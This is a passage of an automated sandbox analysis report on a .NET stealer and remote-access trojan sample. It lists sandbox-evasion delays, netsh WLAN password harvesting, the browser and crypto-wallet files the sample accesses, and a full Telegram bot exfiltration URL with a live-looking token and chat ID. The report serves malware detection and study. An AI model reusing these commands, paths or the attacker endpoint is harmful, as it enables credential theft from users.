Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596608s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe TID: 5676	Thread sleep time: -594469s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596608	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Thread delayed: delay time: 594469	Jump to behavior

Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: eEo6DAcnnx.exe, 00000000.00000002.4766393640.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: eEo6DAcnnx.exe	Binary or memory string: vmware
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: eEo6DAcnnx.exe	Binary or memory string: VMwareVBox
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: tmpCE9E.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

Code function: 0_2_05290B20 LdrInitializeThunk,

0_2_05290B20

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: eEo6DAcnnx.exe, type: SAMPLE

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Queries volume information: C:\Users\user\Desktop\eEo6DAcnnx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: eEo6DAcnnx.exe, 00000000.00000002.4769688524.0000000005140000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected StormKitty Stealer

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus\exodus.wallet
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets
Source: eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\eEo6DAcnnx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Remote Access Functionality

Yara detected StormKitty Stealer

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: eEo6DAcnnx.exe, type: SAMPLE
Source: Yara match	File source: 0.0.eEo6DAcnnx.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2306109761.0000000000902000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: eEo6DAcnnx.exe PID: 1540, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	11 Process Injection	111 Obfuscated Files or Information	1 Input Capture	124 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	1 DLL Side-Loading	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	341 Security Software Discovery	Distributed Component Object Model	1 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	251 Virtualization/Sandbox Evasion	LSA Secrets	1 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Process Injection	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
eEo6DAcnnx.exe	84%	ReversingLabs	ByteCode-MSIL.Backdoor.AsyncRat
eEo6DAcnnx.exe	86%	Virustotal		Browse
eEo6DAcnnx.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
api.mylnikov.org	3%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
icanhazip.com	1%	Virustotal	Browse
55.235.10.0.in-addr.arpa	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://api.telegram.org	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://api.telegram.org/bot	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	9%	Virustotal		Browse
https://api.telegram.org	1%	Virustotal		Browse
https://api.telegram.org/bot	1%	Virustotal		Browse
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-08-04%208:57:31%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20715575%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20U2FFA%0ARAM:%204095MB%0AHWID:%208E348CD443%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%2